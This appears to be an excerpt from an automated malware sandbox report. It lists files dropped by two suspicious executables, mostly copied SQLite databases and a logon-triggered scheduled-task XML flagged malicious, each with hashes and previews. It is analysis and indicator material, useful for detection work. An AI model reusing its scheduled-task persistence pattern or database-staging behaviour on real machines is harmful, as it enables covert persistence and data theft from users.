                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp251C.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp252D.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp253E.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):98304
                                                                              Entropy (8bit):0.08235737944063153
                                                                              Encrypted:false
                                                                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp2665.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp3010.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1572
                                                                              Entropy (8bit):5.109974082247876
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtah5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTWvv
                                                                              MD5:9DAB35F5393ED8F57F052BE5CF1CE0A0
                                                                              SHA1:5073F35EA903FC7B574EDA399EDD1BEE813983A7
                                                                              SHA-256:554AFCEB1DFE351247804981500CFEC8FD9C36E8241AC7CABB17AE11065C565E
                                                                              SHA-512:DEBDDCE7DF24A10B86FFEF643D6D592E789A3031D5536100373864B67E7E68661465A83AE589A319044F5D1B37608960EF7E59CF1B893FBA3F13288BCEEE20A9
                                                                              Malicious:true
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                              C:\Users\user\AppData\Local\Temp\tmp3138.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp3148.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp3159.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp316A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp317A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp319A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp4DAC.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp4DBC.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp4DCD.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp4DDE.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp4DEE.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp4E0E.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5461.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:XML 1.0 document, ASCII text
                                                                              Category:dropped
                                                                              Size (bytes):1572
                                                                              Entropy (8bit):5.109974082247876
                                                                              Encrypted:false
                                                                              SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtah5xvn:cge1wYrFdOFzOzN33ODOiDdKrsuTWvv
                                                                              MD5:9DAB35F5393ED8F57F052BE5CF1CE0A0
                                                                              SHA1:5073F35EA903FC7B574EDA399EDD1BEE813983A7
                                                                              SHA-256:554AFCEB1DFE351247804981500CFEC8FD9C36E8241AC7CABB17AE11065C565E
                                                                              SHA-512:DEBDDCE7DF24A10B86FFEF643D6D592E789A3031D5536100373864B67E7E68661465A83AE589A319044F5D1B37608960EF7E59CF1B893FBA3F13288BCEEE20A9
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                              C:\Users\user\AppData\Local\Temp\tmp5C7A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5C7B.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5CAB.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5CAC.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp5CBD.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):40960
                                                                              Entropy (8bit):0.8553638852307782
                                                                              Encrypted:false
